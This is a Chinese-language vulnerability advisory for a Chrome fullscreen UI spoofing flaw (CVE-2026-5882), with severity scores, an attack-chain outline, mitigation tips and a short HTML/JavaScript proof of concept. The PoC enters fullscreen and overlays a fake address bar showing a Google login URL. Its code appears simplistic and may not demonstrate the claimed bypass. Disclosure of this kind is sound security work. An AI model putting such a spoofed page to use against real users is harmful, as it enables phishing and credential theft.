CVE-2026-5882 Google Chrome全屏UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-5882

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome浏览器在147.0.7727.55之前的版本中存在一个安全UI显示不当的漏洞。该漏洞源于全屏模式下的安全UI设计缺陷。远程攻击者可以通过诱骗用户访问特制的HTML页面来利用此漏洞。成功利用后，攻击者能够执行UI欺骗攻击，篡改浏览器界面显示的内容，从而诱导用户进行非预期操作或泄露敏感信息，影响系统的完整性。

技术细节

该漏洞属于浏览器安全策略绕过类漏洞，具体表现为Google Chrome在处理全屏模式时的安全UI提示逻辑存在缺陷。通常情况下，当网页进入全屏模式时，浏览器会强制显示特定的提示信息（如“按ESC退出全屏”）以防止钓鱼攻击。然而，在受影响版本中，攻击者可以通过精心构造的HTML代码和CSS样式，利用DOM操作或特定的API调用序列，在进入全屏时抑制或篡改这些关键的安全提示UI。由于CVSS向量显示无需认证且需要用户交互（UI:R），攻击场景通常涉及社会工程学，诱导用户点击链接或按钮触发全屏。一旦触发，攻击者可以伪造浏览器界面（如伪造登录框、地址栏等），利用用户对浏览器原生UI的信任，绕过用户的警惕性，实施点击劫持或钓鱼攻击。虽然机密性未受直接影响（C:N），但完整性受到低等影响（I:L），意味着用户可能会被误导执行错误的操作。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意HTML和JavaScript代码的网页，该代码能够调用Fullscreen API并伪造浏览器UI元素。

STEP 2

步骤2

攻击者通过网络钓鱼或其他社会工程学手段，诱导受害者访问该恶意网页。

STEP 3

步骤3

受害者在网页上点击特定按钮（如“播放视频”），触发浏览器进入全屏模式。

STEP 4

步骤4

由于漏洞，浏览器未能正确显示退出全屏的安全提示，攻击者的伪造UI覆盖在屏幕上，欺骗用户输入信息或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-5882: UI Spoofing in Fullscreen -->
<!DOCTYPE html>
<html>
<head>
    <style>
        body { margin: 0; overflow: hidden; background: #fff; font-family: sans-serif; }
        .fake-ui {
            position: fixed; top: 0; left: 0; width: 100%; height: 30px;
            background: #f1f3f4; border-bottom: 1px solid #ccc;
            display: flex; align-items: center; padding: 0 10px;
            box-sizing: border-box; visibility: hidden;
        }
        .fake-url { background: #fff; border: 1px solid #ddd; flex-grow: 1; padding: 2px 10px; border-radius: 10px; color: #5f6368; }
    </style>
</head>
<body>
    <button id="btn">Click to watch video</button>
    <div id="fakeBar" class="fake-ui">
        <div class="fake-url">https://www.google.com/account/login</div>
    </div>
    <script>
        document.getElementById('btn').addEventListener('click', async () => {
            // Trigger Fullscreen API
            await document.documentElement.requestFullscreen();
            
            // Simulate UI Spoofing by showing fake address bar
            // Exploits the lack of proper security UI in fullscreen
            document.getElementById('fakeBar').style.visibility = 'visible';
            document.getElementById('btn').style.display = 'none';
            console.log("Exploit triggered: UI Spoofing in Fullscreen");
        });
    </script>
</body>
</html>

影响范围

Google Chrome < 147.0.7727.55

防御指南

临时缓解措施

用户应谨慎对待要求进入全屏模式的网页，特别是通过点击按钮触发的场景。如果发现全屏页面没有出现正常的浏览器退出提示或地址栏消失，应立即按Esc键退出并关闭标签页。建议尽快安装官方发布的安全补丁以修复此漏洞。